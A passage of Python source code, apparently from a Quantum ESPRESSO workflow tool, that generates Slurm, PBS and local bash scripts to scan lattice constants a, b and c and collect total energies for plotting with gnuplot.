fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" %s $PMF_PWX < relax-${a}.in | tee relax-${a}.out\n" % self.run_params["mpi"])
fout.write("done\n")
else:
# a is not optimized
if nc >= 2:
# only optimize c
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
fout.write(" cp relax.in.template relax-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${c}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" %s $PMF_PWX < relax-${c}.in | tee relax-${c}.out\n" % self.run_params["mpi"])
fout.write("done\n")
else:
# neither a nor c is optimized
pass
# gen cdcloud script
with open("relax-tetragonal-%d-%d.slurm_cd" % (i_batch_a, i_batch_c), 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("#SBATCH -p %s\n" % self.run_params["partition"])
fout.write("#SBATCH -N %d\n" % self.run_params["nodes"])
fout.write("#SBATCH -n %d\n" % self.run_params["ntask"])
fout.write("#SBATCH -J %s-%d-%d\n" % (self.run_params["jobname"], i_batch_a, i_batch_c))
fout.write("#SBATCH -o %s\n" % self.run_params["stdout"])
fout.write("#SBATCH -e %s\n" % self.run_params["stderr"])
fout.write("#\n")
fout.write("export I_MPI_PMI_LIBRARY=/opt/gridview/slurm/lib/libpmi.so\n")
#fout.write("mpirun -np $NP -machinefile $PBS_NODEFILE %s < %s > %s\n" % (cmd, inpname, output))
a = np.sqrt(self.arts.xyz.cell[0][0]**2+self.arts.xyz.cell[0][1]**2+self.arts.xyz.cell[0][2]**2)
b = np.sqrt(self.arts.xyz.cell[1][0]**2+self.arts.xyz.cell[1][1]**2+self.arts.xyz.cell[1][2]**2)
c = np.sqrt(self.arts.xyz.cell[2][0]**2+self.arts.xyz.cell[2][1]**2+self.arts.xyz.cell[2][2]**2)
fout.write("a_in=%f\n" % a)
fout.write("b_in=%f\n" % b)
fout.write("c_in=%f\n" % c)
fout.write("a1=%f\n" % self.arts.xyz.cell[0][0])
fout.write("a2=%f\n" % self.arts.xyz.cell[0][1])
fout.write("a3=%f\n" % self.arts.xyz.cell[0][2])
fout.write("b1=%f\n" % self.arts.xyz.cell[1][0])
fout.write("b2=%f\n" % self.arts.xyz.cell[1][1])
fout.write("b3=%f\n" % self.arts.xyz.cell[1][2])
fout.write("c1=%f\n" % self.arts.xyz.cell[2][0])
fout.write("c2=%f\n" % self.arts.xyz.cell[2][1])
fout.write("c3=%f\n" % self.arts.xyz.cell[2][2])
range_a_start = range_a[0] + i_batch_a * self.batch_a * range_a[2]
range_a_end = range_a[0] + (i_batch_a+1) * self.batch_a * range_a[2] - range_a[2] / 2
# subtract range_a[2] / 2 so the last value, which is actually the beginning of the next batch, is skipped
if range_a_end > range_a[1]:
range_a_end = range_a[1]
range_c_start = range_c[0] + i_batch_c * self.batch_c * range_c[2]
range_c_end = range_c[0] + (i_batch_c+1) * self.batch_c * range_c[2] - range_c[2] / 2
# subtract range_c[2] / 2 so the last value, which is actually the beginning of the next batch, is skipped
if range_c_end > range_c[1]:
range_c_end = range_c[1]
if na >= 2:
# a is optimized
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a_start, range_a[2], a+range_a_end))
fout.write("do\n")
if nc >= 2:
# optimize both a and c
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
fout.write(" cp relax.in.template relax-${a}-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}-${c}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" srun --mpi=pmix_v3 $PMF_PWX < relax-${a}-${c}.in > relax-${a}-${c}.out\n")
fout.write(" done\n")
else:
# only optimize a
fout.write(" cp relax.in.template relax-${a}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" srun --mpi=pmix_v3 $PMF_PWX < relax-${a}.in > relax-${a}.out\n")
fout.write("done\n")
else:
# a is not optimized
if nc >= 2:
# only optimize c
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
fout.write(" cp relax.in.template relax-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${c}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" srun --mpi=pmix_v3 $PMF_PWX < relax-${c}.in > relax-${c}.out\n")
fout.write("done\n")
else:
# neither a nor c is optimized
pass
# generate result analysis script
os.system("mkdir -p post-processing")
with open("post-processing/get_energy.sh", 'w') as fout:
fout.write("#!/bin/bash\n")
# write the data-file header, depending on which lattice constants are scanned
if na >= 2 and nc >= 2:
fout.write("cat > energy-latconst.data <<EOF\n")
fout.write("# format: a c energy(Ry)\n")
fout.write("EOF\n")
if na >= 2 and nc < 2:
fout.write("cat > energy-latconst.data <<EOF\n")
fout.write("# format: a energy(Ry)\n")
fout.write("EOF\n")
if na < 2 and nc >= 2:
fout.write("cat > energy-latconst.data <<EOF\n")
fout.write("# format: c energy(Ry)\n")
fout.write("EOF\n")
# end
if na >= 2:
# a is optimized
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a[0], range_a[2], a+range_a[1]))
fout.write("do\n")
if nc >= 2:
# both a and c are optimized
fout.write(" for c in `seq -w %f %f %f`\n" % (c+range_c[0], range_c[2], c+range_c[1]))
fout.write(" do\n")
fout.write(" energy=`cat ../relax-${a}-${c}.out | grep '! total energy' | tail -1`\n")
fout.write(" cat >> energy-latconst.data <<EOF\n")
fout.write("${a} ${c} ${energy:32:-2}\n")
fout.write("EOF\n")
fout.write(" done\n")
fout.write("done\n")
fout.write("cat > energy-latconst.gp <<EOF\n")
fout.write("set term gif\n")
fout.write("set output 'energy-latconst.gif'\n")
fout.write("set title 'Energy Latconst'\n")
fout.write("set xlabel 'latconst(a)'\n")
fout.write("set ylabel 'latconst(c)'\n")
fout.write("set zlabel 'Energy'\n")
fout.write("splot 'energy-latconst.data'\n")
fout.write("EOF\n")
else:
fout.write(" energy=`cat ../relax-${a}.out | grep '! total energy' | tail -1`\n")
fout.write(" cat >> energy-latconst.data <<EOF\n")
fout.write("${a} ${energy:32:-2}\n")
fout.write("EOF\n")
fout.write("done\n")
fout.write("cat > energy-latconst.gp <<EOF\n")
fout.write("set term gif\n")
fout.write("set output 'energy-latconst.gif'\n")
fout.write("set title 'Energy Latconst'\n")
fout.write("set xlabel 'latconst(a)'\n")
fout.write("set ylabel 'Energy'\n")
fout.write("plot 'energy-latconst.data' w l\n")
fout.write("EOF\n")
else:
# a is not optimized
if nc >= 2:
# only c is optimized
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c[0], range_c[2], c+range_c[1]))
fout.write("do\n")
fout.write(" energy=`cat ../relax-${c}.out | grep '! total energy' | tail -1`\n")
fout.write(" cat >> energy-latconst.data <<EOF\n")
fout.write("${c} ${energy:32:-2}\n")
fout.write("EOF\n")
fout.write("done\n")
fout.write("cat > energy-latconst.gp <<EOF\n")
fout.write("set term gif\n")
fout.write("set output 'energy-latconst.gif'\n")
fout.write("set title 'Energy Latconst'\n")
fout.write("set xlabel 'latconst(c)'\n")
fout.write("set ylabel 'Energy'\n")
fout.write("plot 'energy-latconst.data' w l\n")
fout.write("EOF\n")
else:
# neither a nor c is optimized
pass
fout.write("gnuplot energy-latconst.gp\n")
#os.system("cd post-processing; bash get_energy.sh; cd ../")
os.chdir("../")
if runopt == "run" or runopt == "genrun":
os.chdir(directory)
for i_batch_a in range(n_batch_a):
for i_batch_c in range(n_batch_c):
os.system("bash relax-tetragonal-%d-%d.bash" % (i_batch_a, i_batch_c))
os.chdir("../")
for i_batch_a in range(n_batch_a):
for i_batch_c in range(n_batch_c):
server_handle(auto=auto, directory=directory, jobfilebase="relax-tetragonal-%d-%d" % (i_batch_a, i_batch_c), server=self.run_params["server"])
def abc(self, directory="tmp-qe-opt-abc", runopt="gen", auto=0, range_a=[-0.1, 0.1, 0.01], range_b=[-0.1, 0.1, 0.01], range_c=[-0.1, 0.1, 0.01]):
"""
Optimize the lattice constants a, b and c over the given ranges,
with the scan split into batches along each axis (self.batch_a/b/c).
"""
na = len(np.arange(range_a[0], range_a[1], range_a[2]))
nb = len(np.arange(range_b[0], range_b[1], range_b[2]))
nc = len(np.arange(range_c[0], range_c[1], range_c[2]))
if self.batch_a is None:
# None means all a values go in one batch
self.batch_a = na
if self.batch_b is None:
# None means all b values go in one batch
self.batch_b = nb
if self.batch_c is None:
# None means all c values go in one batch
self.batch_c = nc
if na % self.batch_a == 0:
n_batch_a = int(na / self.batch_a)
else:
n_batch_a = int(na / self.batch_a) + 1
if nb % self.batch_b == 0:
n_batch_b = int(nb / self.batch_b)
else:
n_batch_b = int(nb / self.batch_b) + 1
if nc % self.batch_c == 0:
n_batch_c = int(nc / self.batch_c)
else:
n_batch_c = int(nc / self.batch_c) + 1
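The if/else pairs above compute the number of batches needed to cover n grid points with batch size b, i.e. ceiling division; a minimal equivalent sketch (`n_batches` is a hypothetical helper, not part of this module):

```python
import math

# Ceiling division: a remainder of points costs one extra batch.
def n_batches(n, b):
    return math.ceil(n / b)

assert n_batches(20, 5) == 4  # evenly divisible: no extra batch
assert n_batches(21, 5) == 5  # the remainder needs one more batch
```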
#
if os.path.exists(directory):
shutil.rmtree(directory)
os.mkdir(directory)
shutil.copyfile(self.arts.xyz.file, os.path.join(directory, os.path.basename(self.arts.xyz.file)))
#all_upfs = [s for s in os.listdir() if s.split(".")[-1] == "UPF"]
all_file = os.listdir()
for element in self.arts.xyz.specie_labels:
for item in all_file:
#if re.match("(%s)(.*)(upf)" % element, item, re.IGNORECASE):
#if item.split(".")[0].lower() == element.lower() or item.split("_")[0].lower() == element.lower():
if re.match("(%s)(.*)(upf)" % element, item, re.IGNORECASE) or re.match("(%s)(_*)(upf)" % element, item, re.IGNORECASE):
shutil.copyfile(item, os.path.join(directory, item))
break
self.arts.pseudo.dir = os.path.abspath(directory)
self.control.set_params({"pseudo_dir": os.path.abspath(directory)})
#
os.chdir(directory)
with open("relax.in.template", 'w') as fout:
self.control.to_in(fout)
self.system.to_in(fout)
self.electrons.to_in(fout)
self.ions.to_in(fout)
coordtype = "crystal" # use crystal coordinates so that only the cell needs changing when optimizing the cell
fout.write("ATOMIC_SPECIES\n")
all_file = os.listdir(self.arts.pseudo.dir)
for element in self.arts.xyz.specie_labels:
for item in all_file:
#if re.match("(%s)(.*)(upf)" % (element), item, re.IGNORECASE):
if item.split(".")[0].lower() == element.lower() or item.split("_")[0].lower() == element.lower():
fout.write("%s %f %s\n" % (element, base.element[element].mass, item))
break
fout.write("\n")
if coordtype == "angstrom":
fout.write("ATOMIC_POSITIONS angstrom\n")
if self.arts.ifstatic == True:
for atom in self.arts.xyz.atoms:
fout.write("%s\t%.9f\t%.9f\t%.9f\n" % (atom.name, atom.x, atom.y, atom.z))
elif self.arts.ifstatic == False:
for atom in self.arts.xyz.atoms:
fout.write("%s\t%.9f\t%.9f\t%.9f" % (atom.name, atom.x, atom.y, atom.z))
for fix in atom.fix:
if fix == True:
fout.write("\t0")
elif fix == False:
fout.write("\t1")
fout.write("\n")
else:
print("===============================================\n")
print("Error: qe.base.arts.to_in():\n")
print("arts.ifstatic must be either True or False\n")
sys.exit(1)
fout.write("\n")
elif coordtype == "crystal":
# crystal (fractional) coordinates can be converted from cartesian coordinates
# the conversion is analogous to a change of representation in quantum mechanics
# convmat is built to perform that conversion
#latcell = np.array(self.xyz.cell)
#latcell = latcell.reshape(3, 3)
latcell = np.array(self.arts.xyz.cell)
convmat = np.linalg.inv(latcell.T)
crystal_coord = np.zeros([self.arts.xyz.natom, 3])
for i in range(self.arts.xyz.natom):
crystal_coord[i] = convmat.dot(np.array([self.arts.xyz.atoms[i].x, self.arts.xyz.atoms[i].y, self.arts.xyz.atoms[i].z]))
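The conversion above can be illustrated with a hypothetical diagonal (tetragonal) cell; the rows of `cell` are lattice vectors, so a Cartesian position r and fractional coordinates f satisfy r = cell.T @ f, hence f = inv(cell.T) @ r:

```python
import numpy as np

# Sketch of the Cartesian -> fractional conversion, with an assumed 4x4x6 cell.
cell = np.array([[4.0, 0.0, 0.0],
                 [0.0, 4.0, 0.0],
                 [0.0, 0.0, 6.0]])
convmat = np.linalg.inv(cell.T)
r = np.array([2.0, 2.0, 3.0])  # Cartesian position (angstrom)
f = convmat.dot(r)             # fractional (crystal) coordinates
assert np.allclose(f, [0.5, 0.5, 0.5])  # cell center in both pictures
```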
#
fout.write("ATOMIC_POSITIONS crystal\n")
if self.arts.ifstatic == True:
for k in range(self.arts.xyz.natom):
fout.write("%s\t%.9f\t%.9f\t%.9f\n" % (self.arts.xyz.atoms[k].name, crystal_coord[k, 0], crystal_coord[k, 1], crystal_coord[k, 2]))
elif self.arts.ifstatic == False:
for k in range(self.arts.xyz.natom):
fout.write("%s\t%.9f\t%.9f\t%.9f" % (self.arts.xyz.atoms[k].name, crystal_coord[k, 0], crystal_coord[k, 1], crystal_coord[k, 2]))
for fix in self.arts.xyz.atoms[k].fix:
if fix == True:
fout.write("\t0")
elif fix == False:
fout.write("\t1")
fout.write("\n")
else:
print("===============================================\n")
print("Error: qe.base.arts.to_in():\n")
print("arts.ifstatic must be either True or False\n")
sys.exit(1)
fout.write("\n")
# end crystal type ATOMIC_POSITIONS
# writing KPOINTS to the fout
self.arts.write_kpoints(fout)
# =========================
#
# writing forces act on atoms
if self.arts.atomic_forces_status == True:
self.arts.write_atomic_forces(fout)
# =========================
for i_batch_a in range(n_batch_a):
for i_batch_b in range(n_batch_b):
for i_batch_c in range(n_batch_c):
range_a_start = range_a[0] + i_batch_a * self.batch_a * range_a[2]
range_a_end = range_a[0] + (i_batch_a+1) * self.batch_a * range_a[2] - range_a[2] / 2
# subtract range_a[2] / 2 so the last value, which is actually the beginning of the next batch, is skipped
if range_a_end > range_a[1]:
range_a_end = range_a[1]
range_b_start = range_b[0] + i_batch_b * self.batch_b * range_b[2]
range_b_end = range_b[0] + (i_batch_b+1) * self.batch_b * range_b[2] - range_b[2] / 2
# subtract range_b[2] / 2 so the last value, which is actually the beginning of the next batch, is skipped
if range_b_end > range_b[1]:
range_b_end = range_b[1]
range_c_start = range_c[0] + i_batch_c * self.batch_c * range_c[2]
range_c_end = range_c[0] + (i_batch_c+1) * self.batch_c * range_c[2] - range_c[2] / 2
# subtract range_c[2] / 2 so the last value, which is actually the beginning of the next batch, is skipped
if range_c_end > range_c[1]:
range_c_end = range_c[1]
a = np.sqrt(self.arts.xyz.cell[0][0]**2+self.arts.xyz.cell[0][1]**2+self.arts.xyz.cell[0][2]**2)
b = np.sqrt(self.arts.xyz.cell[1][0]**2+self.arts.xyz.cell[1][1]**2+self.arts.xyz.cell[1][2]**2)
c = np.sqrt(self.arts.xyz.cell[2][0]**2+self.arts.xyz.cell[2][1]**2+self.arts.xyz.cell[2][2]**2)
# gen llhpc script
with open("opt-abc-%d-%d-%d.slurm" % (i_batch_a, i_batch_b, i_batch_c), 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("#SBATCH -p %s\n" % self.run_params["partition"])
fout.write("#SBATCH -N %d\n" % self.run_params["nodes"])
fout.write("#SBATCH -n %d\n" % self.run_params["ntask"])
fout.write("#SBATCH -J %s-%d-%d-%d\n" % (self.run_params["jobname"], i_batch_a, i_batch_b, i_batch_c))
fout.write("#SBATCH -o %s\n" % self.run_params["stdout"])
fout.write("#SBATCH -e %s\n" % self.run_params["stderr"])
fout.write("a_in=%f\n" % a)
fout.write("b_in=%f\n" % b)
fout.write("c_in=%f\n" % c)
fout.write("a1=%f\n" % self.arts.xyz.cell[0][0])
fout.write("a2=%f\n" % self.arts.xyz.cell[0][1])
fout.write("a3=%f\n" % self.arts.xyz.cell[0][2])
fout.write("b1=%f\n" % self.arts.xyz.cell[1][0])
fout.write("b2=%f\n" % self.arts.xyz.cell[1][1])
fout.write("b3=%f\n" % self.arts.xyz.cell[1][2])
fout.write("c1=%f\n" % self.arts.xyz.cell[2][0])
fout.write("c2=%f\n" % self.arts.xyz.cell[2][1])
fout.write("c3=%f\n" % self.arts.xyz.cell[2][2])
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a_start, range_a[2], a+range_a_end))
fout.write("do\n")
fout.write("for b in `seq -w %f %f %f`\n" % (b+range_b_start, range_b[2], b+range_b_end))
fout.write("do\n")
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
#fout.write(" mkdir relax-${a}-${b}-${c}\n")
fout.write(" cp relax.in.template relax-${a}-${b}-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${b} / ${b_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${b} / ${b_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${b} / ${b_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}-${b}-${c}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" yhrun $PMF_PWX < relax-${a}-${b}-${c}.in > relax-${a}-${b}-${c}.out\n")
fout.write("done\n")
fout.write("done\n")
fout.write("done\n")
# gen pbs script
with open("opt-abc-%d-%d-%d.pbs" % (i_batch_a, i_batch_b, i_batch_c), 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("#PBS -N %s-%d-%d-%d\n" % (self.run_params["jobname"], i_batch_a, i_batch_b, i_batch_c))
fout.write("#PBS -l nodes=%d:ppn=%d\n" % (self.run_params["nodes"], self.run_params["ppn"]))
if "queue" in self.run_params and self.run_params["queue"] is not None:
    fout.write("#PBS -q %s\n" % self.run_params["queue"])
fout.write("\n")
fout.write("cd $PBS_O_WORKDIR\n")
fout.write("NP=`cat $PBS_NODEFILE | wc -l`\n")
fout.write("a_in=%f\n" % a)
fout.write("b_in=%f\n" % b)
fout.write("c_in=%f\n" % c)
fout.write("a1=%f\n" % self.arts.xyz.cell[0][0])
fout.write("a2=%f\n" % self.arts.xyz.cell[0][1])
fout.write("a3=%f\n" % self.arts.xyz.cell[0][2])
fout.write("b1=%f\n" % self.arts.xyz.cell[1][0])
fout.write("b2=%f\n" % self.arts.xyz.cell[1][1])
fout.write("b3=%f\n" % self.arts.xyz.cell[1][2])
fout.write("c1=%f\n" % self.arts.xyz.cell[2][0])
fout.write("c2=%f\n" % self.arts.xyz.cell[2][1])
fout.write("c3=%f\n" % self.arts.xyz.cell[2][2])
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a_start, range_a[2], a+range_a_end))
fout.write("do\n")
fout.write("for b in `seq -w %f %f %f`\n" % (b+range_b_start, range_b[2], b+range_b_end))
fout.write("do\n")
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
#fout.write(" mkdir relax-${a}-${b}-${c}\n")
fout.write(" cp relax.in.template relax-${a}-${b}-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${b} / ${b_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${b} / ${b_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${b} / ${b_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}-${b}-${c}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" mpirun -np $NP -machinefile $PBS_NODEFILE $PMF_PWX < relax-${a}-${b}-${c}.in > relax-${a}-${b}-${c}.out\n")
fout.write("done\n")
fout.write("done\n")
fout.write("done\n")
# gen local bash script
with open("opt-abc-%d-%d-%d.sh" % (i_batch_a, i_batch_b, i_batch_c), 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("a_in=%f\n" % a)
fout.write("b_in=%f\n" % b)
fout.write("c_in=%f\n" % c)
fout.write("a1=%f\n" % self.arts.xyz.cell[0][0])
fout.write("a2=%f\n" % self.arts.xyz.cell[0][1])
fout.write("a3=%f\n" % self.arts.xyz.cell[0][2])
fout.write("b1=%f\n" % self.arts.xyz.cell[1][0])
fout.write("b2=%f\n" % self.arts.xyz.cell[1][1])
fout.write("b3=%f\n" % self.arts.xyz.cell[1][2])
fout.write("c1=%f\n" % self.arts.xyz.cell[2][0])
fout.write("c2=%f\n" % self.arts.xyz.cell[2][1])
fout.write("c3=%f\n" % self.arts.xyz.cell[2][2])
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a_start, range_a[2], a+range_a_end))
fout.write("do\n")
fout.write("for b in `seq -w %f %f %f`\n" % (b+range_b_start, range_b[2], b+range_b_end))
fout.write("do\n")
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
#fout.write(" mkdir relax-${a}-${b}-${c}\n")
fout.write(" cp relax.in.template relax-${a}-${b}-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
